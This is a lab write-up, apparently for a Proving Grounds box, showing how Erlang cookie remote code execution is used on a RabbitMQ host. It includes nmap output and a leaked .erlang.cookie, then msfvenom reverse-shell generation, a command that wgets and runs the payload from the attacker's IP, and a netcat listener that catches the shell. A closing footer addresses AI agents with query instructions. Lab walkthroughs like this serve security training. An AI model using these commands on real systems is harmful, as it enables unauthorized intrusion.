# 5 :4369 epmd Using ``` $ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $ip Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 20:03 PDT Nmap scan report for 192.168.197.68 Host is up (0.074s latency). PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon | epmd-info: | epmd_port: 4369 | nodes: |_ rabbit: 65000 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds # so this tells us there's a rabbitmq node running on 65000, which nmap was unable to identify https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce # erlang cookie RCE Using ftp, we can get it # path: /var/lib/rabbitmq/ ftp> ls -la 227 Entering Passive Mode (192,168,197,68,156,64). 150 Here comes the directory listing. drwxr-xr-x 3 ftp ftp 4096 May 08 2020 . drwxr-xr-x 25 ftp ftp 4096 Apr 24 2020 .. -r-------- 1 ftp ftp 20 Apr 24 2020 .erlang.cookie drwxr-x--- 6 ftp ftp 4096 Mar 10 20:43 mnesia 226 Directory send OK. $ cat .erlang.cookie JPCGJCAEWHPKKPBXBYYB # more docs on how to RCE using erl and .erlang.cookie https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # . at end of every makes it execute # -sname shortname (no domain needed) # preffered: -name user@domain $ erl -cookie JPCGJCAEWHPKKPBXBYYB -name kashz@kali Erlang/OTP 24 [erts-12.0.3] [source] [64-bit] [smp:8:8] [ds:8:8:10] [async-threads:1] [jit] Eshell V12.0.3 (abort with ^G) (kashz@kali)1> net_adm:names('192.168.197.68'). {ok,[{"rabbit",65000}]} # success, rabbit node running on port 65000 # now to ping to confirm, cookie is valid # pong = success | pang = failure (kashz@kali)2> net_adm:ping('clyde@192.168.197.68'). pang # exploit/multi/misc/erlang_cookie_rce not working # checking for automated exploit-db script Using https://www.exploit-db.com/exploits/49418 # generate shell $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.197 LPORT=4369 -f elf -o kashz # update TARGET = "192.168.197.68" PORT = 65000 COOKIE = "JPCGJCAEWHPKKPBXBYYB" CMD = "wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz" $ python3 49418.py Extracted challenge: 1605844421 Authentication successful Sending cmd: 'wget 192.168.49.197/kashz -O /tmp/kashz && chmod 777 /tmp/kashz && /tmp/kashz' b'\x00\x00\x00\x00' $ nc -lvnp 4369 listening on [any] 4369 ... connect to [192.168.49.197] from (UNKNOWN) [192.168.197.68] 35926 rabbitmq@clyde:/var/lib/rabbitmq$ whoami;id;hostname;uname -a rabbitmq uid=107(rabbitmq) gid=112(rabbitmq) groups=112(rabbitmq) clyde Linux clyde 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64 GNU/Linux ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/clyde/5-4369-epmd.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.